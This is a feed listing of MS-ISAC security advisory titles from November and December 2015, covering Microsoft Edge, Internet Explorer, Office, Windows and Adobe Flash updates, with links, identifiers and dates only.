https://msisac.cisecurity.org/advisories/2015/2015-140.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:a5d8e4c8-c3fb-a6aa-73fc-01b7f2cca536 Tue, 08 Dec 2015 05:00:00 +0000 ... Cumulative Security Update for Microsoft Edge (MS15-125) https://msisac.cisecurity.org/advisories/2015/2015-139.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:860d3943-1301-190e-4141-fae83930e809 Tue, 08 Dec 2015 05:00:00 +0000 ... Cumulative Security Update for Internet Explorer (MS15-124) https://msisac.cisecurity.org/advisories/2015/2015-138.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:53e841bd-63b7-c50e-1936-cd75e23081eb Tue, 08 Dec 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Adobe Flash Player Could Allow for Remote Code Execution (APSB15-28) https://msisac.cisecurity.org/advisories/2015/2015-136.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:e7822102-d9ff-e076-8a90-6d0477246eed Tue, 10 Nov 2015 05:00:00 +0000 ... Multiple Vulnerabilities in Microsoft Office Could Allow Remote Code Execution (MS15-116) https://msisac.cisecurity.org/advisories/2015/2015-135.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:355540f6-fea2-8186-3756-883fde22ccd6 Tue, 10 Nov 2015 05:00:00 +0000 ... Vulnerabilities in Microsoft Windows Could Allow Remote Code Execution (MS15-115) https://msisac.cisecurity.org/advisories/2015/2015-134.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:79fbfcfa-a172-4391-94a5-8f5b9d2ff63d Tue, 10 Nov 2015 05:00:00 +0000 ... Vulnerability in Microsoft Windows Journal Could Allow Remote Code Execution (MS15-114) https://msisac.cisecurity.org/advisories/2015/2015-133.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:e672163a-0672-f5e5-6bf4-978b6a64f73b Tue, 10 Nov 2015 05:00:00 +0000 ... Cumulative Security Update for Microsoft Edge (MS15-113) https://msisac.cisecurity.org/advisories/2015/2015-132.cfm Center for Internet Security - Multi-State Information Sharing and Analysis Center urn:uuid:426a6b23-ba3b-cf15-4285-b9e05950cd48 Tue, 10 Nov 2015 05:00:00 +0000 ...